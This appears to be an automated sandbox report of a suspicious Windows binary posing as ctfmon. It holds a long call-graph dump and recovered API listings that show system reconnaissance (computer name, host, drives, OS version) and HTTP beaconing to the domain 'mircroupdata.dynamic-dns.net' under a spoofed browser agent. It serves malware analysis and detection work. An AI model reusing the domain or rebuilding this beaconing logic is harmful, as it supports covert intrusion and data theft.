423e07 6 API calls 20781->20784 20782->20780 20785 423e07 6 API calls 20782->20785 20786 42405b 20783->20786 20787 42407a 20783->20787 20784->20782 20785->20786 20786->20783 20788 423e07 6 API calls 20786->20788 20789 424097 20787->20789 20790 424078 20787->20790 20788->20790 20792 4240b0 20789->20792 20793 424095 20789->20793 20790->20787 20791 423e07 6 API calls 20790->20791 20791->20793 20794 4240ae 20792->20794 20795 4240c9 20792->20795 20793->20789 20796 423e07 6 API calls 20793->20796 20794->20792 20797 423e07 6 API calls 20794->20797 20798 4240c7 20795->20798 20799 4240e6 20795->20799 20796->20794 20797->20798 20798->20795 20800 423e07 6 API calls 20798->20800 20799->20801 20802 4240e4 20799->20802 20800->20802 20801->20672 20802->20799 20803 423e07 6 API calls 20802->20803 20804 424101 20803->20804 20804->20801 20807 42523a 20805->20807 20806 425245 20806->20675 20807->20806 20808 424886 ctype 35 API calls 20807->20808 20809 425277 20808->20809 20809->20675 20811 425094 20810->20811 20812 42113e 20810->20812 20855 4250ab GlobalAlloc 20811->20855 20814 42538c GetStockObject 20812->20814 20815 4253b6 GetObjectW 20814->20815 20816 4253ae GetStockObject 20814->20816 20817 4253c7 GetDC 20815->20817 20820 425400 20815->20820 20816->20815 20816->20820 20818 4253e0 GetDeviceCaps MulDiv ReleaseDC 20817->20818 20819 4253db 20817->20819 20818->20820 20819->20818 20860 42527c 20820->20860 20824 425111 GlobalFree 20823->20824 20825 421164 20823->20825 20824->20825 20825->20679 20825->20690 20854 40dec0 20826->20854 20828 422729 GetClassInfoW 20829 422749 RegisterClassW 20828->20829 20830 422755 20828->20830 20829->20830 20831 422759 20829->20831 20830->20755 20832 4283ee ctype 28 API calls 20831->20832 20833 42275e 20832->20833 20833->20830 20834 428f39 ctype 6 API calls 20833->20834 20835 42276c 20834->20835 20836 4283ee ctype 28 API calls 20835->20836 20837 422774 lstrcatW lstrcatW 20836->20837 20838 428fa9 ctype LeaveCriticalSection 20837->20838 20838->20830 20840 4283ee ctype 28 API calls 20839->20840 20841 423dd8 LoadIconW 20840->20841 20842 423df1 LoadIconW 20841->20842 20843 423dfc 20841->20843 20842->20843 20844 42271f 32 API calls 20843->20844 20845 423e02 20844->20845 20845->20761 20847 423e25 GetProcAddress 20846->20847 20848 423e78 20846->20848 20849 423e37 20847->20849 20852 423e52 20847->20852 20848->20769 20850 423e48 #17 20849->20850 20851 423e6f FreeLibrary 20849->20851 20850->20851 20851->20848 20852->20851 20853 423e64 #17 20852->20853 20853->20851 20854->20828 20856 425107 20855->20856 20857 4250c7 GlobalLock 20855->20857 20856->20812 20858 4250de ctype 20857->20858 20859 4250f0 GlobalUnlock 20858->20859 20859->20856 20861 425292 GlobalLock 20860->20861 20862 42528b 20860->20862 20863 4252b5 lstrlenW 20861->20863 20862->20684 20865 4252f4 ctype 20863->20865 20866 42536a GlobalUnlock 20865->20866 20866->20862 20868 4203c0 28 API calls 20867->20868 20869 42ad97 PostQuitMessage 20868->20869 20869->20711 20871 428fca 20876 428fd4 20871->20876 20873 428fcf 20884 40d1f7 20873->20884 20877 429046 GetVersion 20876->20877 20878 429087 GetProcessVersion 20877->20878 20879 429099 20877->20879 20878->20879 20887 424d98 KiUserCallbackDispatcher GetSystemMetrics 20879->20887 20881 4290a0 20894 424d54 7 API calls 20881->20894 20883 4290aa LoadCursorW LoadCursorW 20883->20873 20899 40d179 20884->20899 20888 424db7 20887->20888 20889 424dbe 20887->20889 20895 428ff4 20888->20895 20898 429024 GetSystemMetrics GetSystemMetrics 20889->20898 20893 424dc3 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 20893->20881 20894->20883 20896 424dbc 20895->20896 20897 428ffd GetSystemMetrics GetSystemMetrics 20895->20897 20896->20893 20897->20896 20898->20893 20900 40de4f 29 API calls 20899->20900 20901 40d17f 20900->20901 20910 40ed55 20901->20910 20904 40ed55 30 API calls 20905 40d1a8 20904->20905 20922 40f130 20905->20922 20906 40de58 LeaveCriticalSection 20908 40d1f3 20906->20908 20909 40d1b7 20909->20906 20911 40ed82 20910->20911 20912 40edc8 20910->20912 20913 41257d ctype 29 API calls 20911->20913 20914 40ee13 HeapSize 20912->20914 20917 41257d ctype 29 API calls 20912->20917 20915 40ed89 ctype 20913->20915 20916 40d18a 20914->20916 20947 40edbf 20915->20947 20916->20904 20916->20909 20918 40edd4 ctype 20917->20918 20950 40ee3a 20918->20950 20921 40edb6 20921->20914 20921->20916 20923 40f16a 20922->20923 20924 40f15c 20922->20924 20926 40f171 20923->20926 20927 40f17d 20923->20927 20925 40e10c ctype 29 API calls 20924->20925 20928 40f164 20925->20928 20929 40df0d ctype 29 API calls 20926->20929 20930 40f2c4 20927->20930 20944 40f18b ctype 20927->20944 20928->20909 20929->20928 20931 40f414 ctype 20930->20931 20945 40f2cd ctype 20930->20945 20931->20928 20933 40f422 HeapReAlloc 20931->20933 20932 41257d ctype 29 API calls 20932->20944 20933->20931 20934 41257d ctype 29 API calls 20934->20945 20936 40f3c7 HeapReAlloc 20936->20945 20937 40f217 HeapAlloc 20937->20944 20939 40f26d HeapReAlloc 20939->20944 20940 40f387 HeapAlloc 20940->20945 20941 4130e0 ctype 5 API calls 20941->20944 20942 413b83 ctype 6 API calls 20942->20945 20943 413b3e VirtualFree HeapFree VirtualFree ctype 20943->20945 20944->20928 20944->20932 20944->20937 20944->20939 20944->20941 20946 412db7 VirtualFree VirtualFree HeapFree ctype 20944->20946 20955 40f2bb 20944->20955 20945->20928 20945->20934 20945->20936 20945->20940 20945->20942 20945->20943 20958 40f409 20945->20958 20946->20944 20953 4125de LeaveCriticalSection 20947->20953 20949 40edc6 20949->20921 20954 4125de LeaveCriticalSection 20950->20954 20952 40ee41 20952->20921 20953->20949 20954->20952 20961 4125de LeaveCriticalSection 20955->20961 20957 40f2c2 20957->20944 20962 4125de LeaveCriticalSection 20958->20962 20960 40f410 20960->20945 20961->20957 20962->20960 20963 40d029 GetVersion 20996 4103eb HeapCreate 20963->20996 20965 40d087 20966 40d094 20965->20966 20967 40d08c 20965->20967 21008 4101a8 20966->21008 21086 40d155 20967->21086 20971 40d099 20972 40d0a5 20971->20972 20973 40d09d 20971->20973 21018 40ffec 20972->21018 20974 40d155 8 API calls 20973->20974 20976 40d0a4 20974->20976 20976->20972 20977 40d0af 21032 40ff4b 20977->21032 20983 40d0c8 21072 40fafd 20983->21072 20985 40d0cd 20986 40d0d2 GetStartupInfoW 20985->20986 20987 40d0e4 20986->20987 20988 40d0ed 20987->20988 20989 40d0f6 GetModuleHandleA 20988->20989 21083 41f957 20989->21083 20992 40dd88 32 API calls 20993 40d111 20992->20993 21098 40f940 20993->21098 20997 410441 20996->20997 20998 41040b 20996->20998 20997->20965 21103 4102a3 20998->21103 21001 410427 21004 410444 21001->21004 21117 41388b 21001->21117 21002 41041a 21115 412d44 HeapAlloc 21002->21115 21004->20965 21005 410424 21005->21004 21007 410435 HeapDestroy 21005->21007 21007->20997 21174 412554 InitializeCriticalSection InitializeCriticalSection InitializeCriticalSection InitializeCriticalSection 21008->21174 21010 4101ae TlsAlloc 21011 4101f8 21010->21011 21012 4101be 21010->21012 21011->20971 21013 413f58 30 API calls 21012->21013 21014 4101c7 21013->21014 21014->21011 21015 4101cf TlsSetValue 21014->21015 21015->21011 21016 4101e0 21015->21016 21017 4101e6 GetCurrentThreadId 21016->21017 21017->20971 21019 40e10c ctype 29 API calls 21018->21019 21020 40ffff 21019->21020 21021 41000d GetStartupInfoA 21020->21021 21022 40d130 ctype 7 API calls 21020->21022 21028 41012c 21021->21028 21031 41005b 21021->21031 21022->21021 21024 410157 GetStdHandle 21027 410165 GetFileType 21024->21027 21024->21028 21025 410197 SetHandleCount 21025->20977 21026 40e10c ctype 29 API calls 21026->21031 21027->21028 21028->21024 21028->21025 21029 4100d2 21029->21028 21030 4100f4 GetFileType 21029->21030 21030->21029 21031->21026 21031->21028 21031->21029 21033 40ff64 GetCommandLineW 21032->21033 21034 40ff88 21032->21034 21037 40ff76 GetCommandLineA 21033->21037 21038 40ff6a 21033->21038 21035 40ff7c 21034->21035 21036 40ff8d GetCommandLineW 21034->21036 21039 40ff96 GetCommandLineA MultiByteToWideChar 21035->21039 21044 40d0b4 21035->21044 21036->21044 21037->21035 21037->21044 21038->21036 21040 40ffb7 21039->21040 21039->21044 21041 40e10c ctype 29 API calls 21040->21041 21042 40ffc0 21041->21042 21043 40ffc7 MultiByteToWideChar 21042->21043 21042->21044 21043->21044 21045 40ffda 21043->21045 21047 40fdde 21044->21047 21046 40df0d ctype 29 API calls 21045->21046 21046->21044 21048 40fe28 21047->21048 21049 40fdfc GetEnvironmentStringsW 21047->21049 21051 40fe04 21048->21051 21052 40fe1c 21048->21052 21050 40fe10 GetEnvironmentStrings 21049->21050 21049->21051 21050->21052 21053 40d0be 21050->21053 21054 40fe31 GetEnvironmentStringsW 21051->21054 21055 40fe3d 21051->21055 21052->21053 21056 40fe88 GetEnvironmentStrings 21052->21056 21064 40fe90 ctype 21052->21064 21092 40fbb5 GetModuleFileNameW 21053->21092 21054->21053 21054->21055 21057 40e10c ctype 29 API calls 21055->21057 21056->21053 21056->21064 21060 40fe60 ctype 21057->21060 21058 40fec4 21061 40e10c ctype 29 API calls 21058->21061 21059 40fe97 MultiByteToWideChar 21059->21053 21059->21064 21063 40fe67 FreeEnvironmentStringsW 21060->21063 21062 40fed3 21061->21062 21065 40feda FreeEnvironmentStringsA 21062->21065 21070 40fee9 ctype 21062->21070 21063->21053 21064->21058 21064->21059 21065->21053 21066 40ff31 FreeEnvironmentStringsA 21066->21053 21067 40fef2 MultiByteToWideChar 21068 40ff37 21067->21068 21067->21070 21071 40df0d ctype 29 API calls 21068->21071 21070->21066 21070->21067 21071->21066 21073 40fb07 21072->21073 21074 40e10c ctype 29 API calls 21073->21074 21075 40fb30 21074->21075 21077 40d130 ctype 7 API calls 21075->21077 21082 40fb44 21075->21082 21076 40fb91 21078 40df0d ctype 29 API calls 21076->21078 21077->21082 21079 40fb9d 21078->21079 21079->20985 21080 40e10c ctype 29 API calls 21080->21082 21081 40d130 ctype 7 API calls 21081->21082 21082->21076 21082->21080 21082->21081 21175 426014 21083->21175 21087 40d163 21086->21087 21088 40d15e 21086->21088 21089 410561 ctype 7 API calls 21087->21089 21090 410528 ctype 7 API calls 21088->21090 21091 40d16c ExitProcess 21089->21091 21090->21087 21093 40fbe2 21092->21093 21094 40e10c ctype 29 API calls 21093->21094 21095 40fc07 21094->21095 21096 40fc17 21095->21096 21097 40d130 ctype 7 API calls 21095->21097 21096->20983 21097->21096 21099 41020f 35 API calls 21098->21099 21101 40f94b 21099->21101 21100 40fa71 UnhandledExceptionFilter 21102 40d122 21100->21102 21101->21100 21101->21102 21104 40dbe0 21103->21104 21105 4102b0 GetVersionExA 21104->21105 21106 4102e6 GetEnvironmentVariableA 21105->21106 21107 4102cc 21105->21107 21110 410305 21106->21110 21114 4103c3 21106->21114 21107->21106 21108 4102de 21107->21108 21108->21001 21108->21002 21111 41034a GetModuleFileNameA 21110->21111 21113 410342 21110->21113 21111->21113 21113->21114 21126 4150fb 21113->21126 21114->21108 21129 410276 GetModuleHandleA 21114->21129 21116 412d60 21115->21116 21116->21005 21118 413898 21117->21118 21119 41389f HeapAlloc 21117->21119 21120 4138bc VirtualAlloc 21118->21120 21119->21120 21125 4138f4 ctype 21119->21125 21121 4139b1 21120->21121 21122 4138dc VirtualAlloc 21120->21122 21123 4139b9 HeapFree 21121->21123 21121->21125 21124 4139a3 VirtualFree 21122->21124 21122->21125 21123->21125 21124->21121 21125->21005 21131 415112 21126->21131 21130 41028d 21129->21130 21130->21108 21133 41512a 21131->21133 21134 41515a 21133->21134 21140 415e36 21133->21140 21135 41510e 21134->21135 21136 415e36 6 API calls 21134->21136 21138 415283 21134->21138 21144 416820 21134->21144 21135->21114 21136->21134 21138->21135 21139 40f92e 35 API calls 21138->21139 21139->21135 21141 415e54 21140->21141 21143 415e48 21140->21143 21155 416c3f 21141->21155 21143->21133 21145 41683e InterlockedIncrement 21144->21145 21154 41682b 21144->21154 21146 416864 21145->21146 21147 41685a InterlockedDecrement 21145->21147 21167 41688f 21146->21167 21149 41257d ctype 29 API calls 21147->21149 21149->21146 21151 416884 InterlockedDecrement 21151->21154 21152 41687a 21173 4125de LeaveCriticalSection 21152->21173 21154->21134 21156 416c70 GetStringTypeW 21155->21156 21157 416c88 21155->21157 21156->21157 21158 416c8c GetStringTypeA 21156->21158 21159 416cb3 GetStringTypeA 21157->21159 21160 416cd7 21157->21160 21158->21157 21161 416d74 21158->21161 21159->21161 21160->21161 21163 416ced MultiByteToWideChar 21160->21163 21161->21143 21163->21161 21164 416d11 ctype 21163->21164 21164->21161 21165 416d4b MultiByteToWideChar 21164->21165 21165->21161 21166 416d64 GetStringTypeW 21165->21166 21166->21161 21168 4168ba 21167->21168 21172 416871 21167->21172 21169 4168d6 21168->21169 21170 415e36 6 API calls 21168->21170 21171 412330 9 API calls 21169->21171 21169->21172 21170->21169 21171->21172 21172->21151 21172->21152 21173->21154 21174->21010 21176 4203c0 28 API calls 21175->21176 21177 42601f 21176->21177 21178 4283ee ctype 28 API calls 21177->21178 21179 426026 21178->21179 21184 4291c6 SetErrorMode SetErrorMode 21179->21184 21185 4283ee ctype 28 API calls 21184->21185 21186 4291dd 21185->21186 21187 4283ee ctype 28 API calls 21186->21187 21188 4291ec 21187->21188 21189 429212 21188->21189 21215 429229 21188->21215 21191 4283ee ctype 28 API calls 21189->21191 21192 429217 21191->21192 21193 42603e 21192->21193 21233 4203d5 21192->21233 21195 42aeab 21193->21195 21196 4283ee ctype 28 API calls 21195->21196 21197 42aeb4 21196->21197 21198 428f39 ctype 6 API calls 21197->21198 21200 42aebd 21198->21200 21199 42aeec 21201 428fa9 ctype LeaveCriticalSection 21199->21201 21200->21199 21203 4283ee ctype 28 API calls 21200->21203 21202 42aef7 21201->21202 21204 4283ee ctype 28 API calls 21202->21204 21205 42aedd UnregisterClassW 21203->21205 21206 42aefc 21204->21206 21205->21200 21207 4281c1 21 API calls 21206->21207 21208 42af14 21207->21208 21209 4283ee ctype 28 API calls 21208->21209 21210 42af39 21209->21210 21211 40d108 21210->21211 21212 42af51 21210->21212 21213 42af4b UnhookWindowsHookEx 21210->21213 21211->20992 21212->21211 21214 42af58 UnhookWindowsHookEx 21212->21214 21213->21212 21214->21211 21216 4283ee ctype 28 API calls 21215->21216 21217 42923c GetModuleFileNameW 21216->21217 21218 42926e 21217->21218 21244 429348 21218->21244 21221 4292a1 21223 4292db 21221->21223 21224 424b39 29 API calls 21221->21224 21225 4292f3 lstrcpyW 21223->21225 21226 42930d 21223->21226 21227 4292c3 21224->21227 21228 40dedf 29 API calls 21225->21228 21229 42933c 21226->21229 21230 42931e lstrcatW 21226->21230 21232 40dedf 29 API calls 21227->21232 21228->21226 21229->21189 21231 40dedf 29 API calls 21230->21231 21231->21229 21232->21223 21234 4283ee ctype 28 API calls 21233->21234 21235 4203da 21234->21235 21236 4281c1 21 API calls 21235->21236 21242 420432 21235->21242 21237 4203e6 GetCurrentThreadId SetWindowsHookExW 21236->21237 21238 428c9a ctype 7 API calls 21237->21238 21239 420410 21238->21239 21241 4283ee ctype 28 API calls 21239->21241 21243 42041d 21239->21243 21240 428c05 ctype 21 API calls 21240->21242 21241->21243 21242->21193 21243->21240 21245 429353 21244->21245 21246 429385 lstrcpynW 21245->21246 21247 42937b lstrlenW 21245->21247 21248 42928b 21246->21248 21247->21248 21248->21221 21249 40dedf 21248->21249 21250 40dee8 21249->21250 21252 40def8 21249->21252 21251 40e10c ctype 29 API calls 21250->21251 21251->21252 21252->21221 21253 40ddaa 21254 40de4f 29 API calls 21253->21254 21255 40ddb0 21254->21255 21256 40ddbb GetCurrentProcess TerminateProcess 21255->21256 21259 40ddcc 21255->21259 21256->21259 21257 40de36 21260 40de58 LeaveCriticalSection 21257->21260 21258 40de3d ExitProcess 21259->21257 21259->21258 21261 40de3b 21260->21261 21262 420932 KiUserCallbackDispatcher 21263 420949 21262->21263 21264 42096c 21262->21264 21263->21264 21265 42095e TranslateMessage DispatchMessageW 21263->21265 21265->21264 21266 421ef2 21267 428c05 ctype 21 API calls 21266->21267 21268 421f08 21267->21268 21269 421f13 CallNextHookEx 21268->21269 21270 421f2a 21268->21270 21271 421fd9 21269->21271 21272 4283ee ctype 28 API calls 21270->21272 21273 421f3c 21272->21273 21274 421fe2 21273->21274 21275 421f4e 21273->21275 21295 421c7a 21274->21295 21277 421fb5 CallNextHookEx 21275->21277 21279 421f5b GetWindowLongW 21275->21279 21277->21271 21278 421fcc UnhookWindowsHookEx 21277->21278 21278->21271 21279->21277 21280 421f6b GetPropW 21279->21280 21280->21277 21281 421f7c SetPropW GetPropW 21280->21281 21281->21277 21282 421f94 GlobalAddAtomW 21281->21282 21283 421fa6 21282->21283 21284 421fab SetWindowLongW 21282->21284 21283->21284 21284->21277 21285 422077 21286 42207f SetWindowLongW 21285->21286 21288 42206b 21286->21288 21288->21277 21289 421a74 111 API calls 21290 42202d 21289->21290 21290->21285 21291 422034 21290->21291 21292 422039 GetWindowLongW 21291->21292 21293 422056 21292->21293 21293->21288 21294 42205a SetWindowLongW 21293->21294 21294->21288 21296 421c86 21295->21296 21297 421c8a 21295->21297 21296->21285 21296->21289 21298 421bc3 ctype 57 API calls 21297->21298 21299 421c92 21298->21299 21300 4200ce 29 API calls 21299->21300 21301 421ca0 21300->21301 21302 42443b GetParent 21301->21302 21302->21296 21303 422413 21304 422420 21303->21304 21305 42241c 21303->21305 21306 421bc3 ctype 57 API calls 21304->21306 21307 422429 ctype 21306->21307 21308 422448 21307->21308 21309 42243d KiUserCallbackDispatcher 21307->21309 21310 42245a 21308->21310 21311 421cb3 ctype 57 API calls 21308->21311 21309->21308 21311->21310 21312 420eb3 21327 4224ab 21312->21327 21315 420ed6 21317 420f3f 21337 423c0c 21317->21337 21319 420ef0 GetWindowLongW 21319->21317 21321 420efe 21319->21321 21320 420ecc 21320->21315 21320->21317 21320->21319 21341 42699a GetClassNameW lstrcmpiW 21321->21341 21323 420f0a 21323->21317 21324 420f0e GetDlgItem 21323->21324 21325 420f28 SendMessageW 21324->21325 21326 420f1d IsWindowEnabled 21324->21326 21325->21315 21326->21317 21326->21325 21328 4283ee ctype 28 API calls 21327->21328 21329 420ec1 21328->21329 21329->21315 21330 4230c5 21329->21330 21331 4230d2 21330->21331 21332 4230cc 21330->21332 21331->21320 21332->21331 21336 4230eb 21332->21336 21342 42301a 21332->21342 21334 423102 21334->21320 21335 42301a 59 API calls 21335->21336 21336->21334 21336->21335 21338 423c1a 21337->21338 21339 423c35 21338->21339 21347 4241cf 21338->21347 21339->21315 21341->21323 21343 42304f 21342->21343 21346 423020 21342->21346 21343->21336 21344 42302e GetParent 21345 421c35 58 API calls 21344->21345 21345->21346 21346->21343 21346->21344 21348 4241f1 IsDialogMessageW 21347->21348 21349 4241d8 21347->21349 21351 4241dd 21348->21351 21350 4283ee ctype 28 API calls 21349->21350 21350->21351 21351->21339 21352 421e76 21353 428c9a ctype 7 API calls 21352->21353 21355 421e8a 21353->21355 21358 421ed4 21355->21358 21386 4237b3 21355->21386 21357 421ed8 21358->21357 21359 421d17 21358->21359 21394 40dec0 21359->21394 21361 421d21 GetPropW 21362 421e01 21361->21362 21363 421d54 21361->21363 21364 421c35 58 API calls 21362->21364 21365 421de0 21363->21365 21366 421d5d 21363->21366 21368 421e09 21364->21368 21367 421c35 58 API calls 21365->21367 21369 421d62 21366->21369 21370 421dbc SetWindowLongW RemovePropW GlobalFindAtomW GlobalDeleteAtom 21366->21370 21372 421de6 21367->21372 21373 421c35 58 API calls 21368->21373 21371 421e1f CallWindowProcW 21369->21371 21374 421d6d 21369->21374 21370->21371 21375 421da8 21371->21375 21376 4219fe 66 API calls 21372->21376 21377 421e11 21373->21377 21378 421c35 58 API calls 21374->21378 21375->21357 21379 421df8 21376->21379 21380 42199d 64 API calls 21377->21380 21381 421d73 21378->21381 21382 421e1b 21379->21382 21380->21382 21383 421901 2 API calls 21381->21383 21382->21371 21382->21375 21384 421d83 CallWindowProcW 21383->21384 21385 421924 95 API calls 21384->21385 21385->21375 21387 423822 21386->21387 21388 4237bf 21386->21388 21387->21358 21388->21387 21389 4237e8 GetObjectW SetBkColor 21388->21389 21395 426950 21388->21395 21390 423813 SetTextColor 21389->21390 21391 42380b GetSysColor 21389->21391 21390->21387 21391->21390 21394->21361 21396 4237e4 21395->21396 21397 42695c GetWindowLongW 21395->21397 21396->21387 21396->21389 21397->21396 21398 426973 GetClassNameW lstrcmpiW 21397->21398 21398->21396

        Control-flow Graph

        APIs
        • VirtualAlloc.KERNEL32(00000000,00080000,00001000,00000004), ref: 0040150F
        • WSAStartup.WS2_32(00000202,?), ref: 00401522
        • LoadLibraryW.KERNEL32(Kernel32.dll), ref: 0040152D
        • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0040153F
        • FreeLibrary.KERNEL32(00000000), ref: 0040154B
        • VirtualAlloc.KERNEL32(00000000,000186A0,00001000,00000004), ref: 00401C17
        • VirtualAlloc.KERNEL32(00000000,000186A0,00001000,00000004), ref: 00401C2B
        • VirtualAlloc.KERNEL32(00000000,000186A0,00001000,00000004), ref: 00401C3F
        • VirtualAlloc.KERNEL32(00000000,000186A0,00001000,00000004), ref: 00401C53
        • VirtualAlloc.KERNEL32(00000000,000186A0,00001000,00000004), ref: 00401C67
        • VirtualAlloc.KERNEL32(00000000,000186A0,00001000,00000004), ref: 00401C7B
        • CreateEventW.KERNEL32(00000000,00000001,00000000,fsdf++_[)**huahj6po1klHGH), ref: 00401C97
        • SetEvent.KERNEL32(00000000), ref: 00401C9F
        • CreateEventW.KERNEL32(00000000,00000001,00000001,fsdf++_[)**huahj6po1klHGHSENDDATAPARA), ref: 00401CAF
        • CreateEventW.KERNEL32(00000000,00000001,00000000,fsdf++_[)**huahj6po1klHGHSENDDATAPARAdatahassend), ref: 00401CBF
        • CreateEventW.KERNEL32(00000000,00000001,00000000,fsdf++_[)**huahj6po1klHGHSENDDATAPARAIsSendGet), ref: 00401CCF
        • CreateEventW.KERNEL32(00000000,00000001,00000001,fsdf++_[)**huahj6po1klHGHSENDDATAPARAIsSendPost), ref: 00401CE0
        • CreateEventW.KERNEL32(00000000,00000000,00000000,fsdf++_[)**huahj6po1klHGHSENDDATAPARA0001), ref: 00401CEF
        • CreateEventW.KERNEL32(00000000,00000000,00000000,fsdf++_[)**huahj6po1klHGHSENDDATAPARA0002), ref: 00401CFE
          • Part of subcall function 00405040: GetCommandLineW.KERNEL32(76232F60), ref: 00405068
          • Part of subcall function 00403190: GetComputerNameW.KERNEL32(?), ref: 00403223
          • Part of subcall function 00403190: gethostname.WS2_32(?,00000100), ref: 0040325F
          • Part of subcall function 00403190: gethostbyname.WS2_32(?), ref: 0040326D
          • Part of subcall function 00403D20: GetLogicalDrives.KERNEL32 ref: 00403D25
          • Part of subcall function 00403D20: GetDriveTypeA.KERNEL32(?), ref: 00403D7E
        • CreateThread.KERNEL32(00000000,00000000,Function_00003C80,00000000,00000000,00000000), ref: 00401D64
        • CreateThread.KERNEL32(00000000,00000000,Function_00004150,00000000,00000000,00000000), ref: 00401D70
        • CreateThread.KERNEL32(00000000,00000000,Function_00001130,00000000,00000000,00000000), ref: 00401D7C
        • CreateThread.KERNEL32 ref: 00401D99
        • InternetOpenA.WININET(Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1),00000000,00000000,00000000,00000000), ref: 00401DB7
        • Sleep.KERNEL32(00001388), ref: 00401DC8
        • InternetConnectA.WININET(00000000,mircroupdata.dynamic-dns.net,00000050,00000000,00000000,00000003,00000000,00000001), ref: 00401DE2
        • InternetCloseHandle.WININET(00000000), ref: 00401DEF
        • Sleep.KERNEL32(00001388), ref: 00401DF6
        • HttpOpenRequestA.WININET(00000000,GET,?,00000000,00000000,00000000,84400100,00000002), ref: 00401E19
        • InternetCloseHandle.WININET(00000000), ref: 00401E26
        • InternetCloseHandle.WININET(00000000), ref: 00401E29
        • Sleep.KERNEL32(00001388), ref: 00401E30
        • InternetSetOptionA.WININET(00000000,00000005,?,00000004), ref: 00401E48
        • Sleep.KERNEL32(0000000A), ref: 00401E69
        • WaitForSingleObject.KERNEL32(00000354,000000FF), ref: 00401E78
        • ResetEvent.KERNEL32(00000350), ref: 00401E85
        • HttpAddRequestHeadersA.WININET(00000000,?,?,A0000000), ref: 00401F0E
        • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00401F1D
        • InternetReadFile.WININET(00000000,?,00080000,?), ref: 00401F45
        • GetLastError.KERNEL32(?,A0000000,?,?,?,?,00000000,00000000,Function_00002BA0,00000000,00000000,00000000), ref: 00401F5E
        • SetEvent.KERNEL32(00000350,?,A0000000,?,?,?,?,00000000,00000000,Function_00002BA0,00000000,00000000,00000000), ref: 00401F6B
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182555774.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182571384.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000043B000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182585105.000000000053C000.00000004.00000001.01000000.00000003.sdmpDownload File
        • Associated: 00000000.00000002.2182640148.0000000000542000.00000002.00000001.01000000.00000003.sdmpDownload File
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_0_2_400000_ctfmon.jbxd
        Similarity
        • API ID: Create$Event$AllocInternetVirtual$SleepThread$CloseHandleHttpRequest$LibraryOpen$AddressCommandComputerConnectDriveDrivesErrorFileFreeHeadersLastLineLoadLogicalNameObjectOptionProcReadResetSendSingleStartupTypeWaitgethostbynamegethostname
        • String ID: $#$#$'$*$+$+$3$4$5$675052$9$:$@$@$B$B$GET$GetNativeSystemInfo$H$H$H$H$Kernel32.dll$L$L$L$L$L$L$L$L$L$Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)$N$O$P$P$P$P$P$P$P$P$P$P$PTPM$Q$Q$Q$Q$R$R$R$Referer: %02x%02x%02x%02x%02x%02x%02x%02x=+$T$T$V$X$X$X$X$Y$[$\$\$]$^$_$_$`$`$`$a$a$a$d$d$d$fsdf++_[)**huahj6po1klHGH$fsdf++_[)**huahj6po1klHGHSENDDATAPARA$fsdf++_[)**huahj6po1klHGHSENDDATAPARA0001$fsdf++_[)**huahj6po1klHGHSENDDATAPARA0002$fsdf++_[)**huahj6po1klHGHSENDDATAPARAIsSendGet$fsdf++_[)**huahj6po1klHGHSENDDATAPARAIsSendPost$fsdf++_[)**huahj6po1klHGHSENDDATAPARAdatahassend$h$h$h$h$item.asp?spm=xx{}:>*()_!$j$j$k$mircroupdata.dynamic-dns.net$p$t$t$|$|
        • API String ID: 532994470-3063579737
        • Opcode ID: 7ab0d9eef510a3772e120244943042c5d8440bc05c794fce203168c27190420c
        • Instruction ID: bf1a022c60407e02be0dd9bd1b531f7c38c72e15a62a5c9b7b3f82dbccb0f244
        • Opcode Fuzzy Hash: 7ab0d9eef510a3772e120244943042c5d8440bc05c794fce203168c27190420c
        • Instruction Fuzzy Hash: 7D62482010C7C5D9E332C7788849B8FBED55BA7324F484A9DF1E86B2D2C6B95109C76B

        Control-flow Graph

        • Executed
        • Not Executed
        control_flow_graph 79 403190-4031a5 80 403545-40354f 79->80 81 4031ab-40322e GetComputerNameW 79->81 82 403230 81->82 83 403238-403275 gethostname gethostbyname 81->83 82->83 84 403277-4032d7 call 40d60e call 403550 83->84 85 4032df-40336d timeGetTime call 40d60e 83->85 94 4032dc 84->94 85->80 90 403373-403397 GetVersionExW 85->90 92 4033b0-4033b7 90->92 93 403399-4033aa GetVersionExW 90->93 95 403446-403449 92->95 96 4033bd-4033c4 92->96 93->80 93->92 94->85 97 4034f6-403543 call 40d60e 95->97 98 40344f-403456 95->98 99 4033c6-4033d5 96->99 100 4033eb-4033f2 96->100 97->80 101 4034b8-4034bb 98->101 102 403458-403464 GetSystemMetrics 98->102 103 4033e1-4033e6 99->103 104 4033d7-4033dc 99->104 105 4033f4-403403 100->105 106 403419-40341b 100->106 114 4034ca-4034cc 101->114 115 4034bd-4034c8 101->115 109 403473-40347d 102->109 110 403466-403471 102->110 111 4034d9-4034f4 103->111 104->111 112 403405-40340a 105->112 113 40340f-403414 105->113 106->97 116 403421-403430 106->116 117 40348c-403492 GetSystemMetrics 109->117 118 40347f-40348a 109->118 110->111 111->97 112->111 113->111 114->97 119 4034ce-4034d4 114->119 115->111 120 403432-403437 116->120 121 40343c-403441 116->121 122 4034a1-4034a9 117->122 123 403494-40349f 117->123 118->111 119->111 120->111 121->111 122->97 124 4034ab-4034b6 122->124 123->111 124->111
        APIs
        • GetComputerNameW.KERNEL32(?), ref: 00403223
        • gethostname.WS2_32(?,00000100), ref: 0040325F
        • gethostbyname.WS2_32(?), ref: 0040326D
        • timeGetTime.WINMM ref: 004032FD
        • GetVersionExW.KERNEL32(?), ref: 00403393
        • GetVersionExW.KERNEL32(0000011C), ref: 004033A6
        Strings
        Memory Dump Source
        • Source File: 00000000.00000002.2182532553.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
        • Associated: 00000000.00000002.2182520272.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
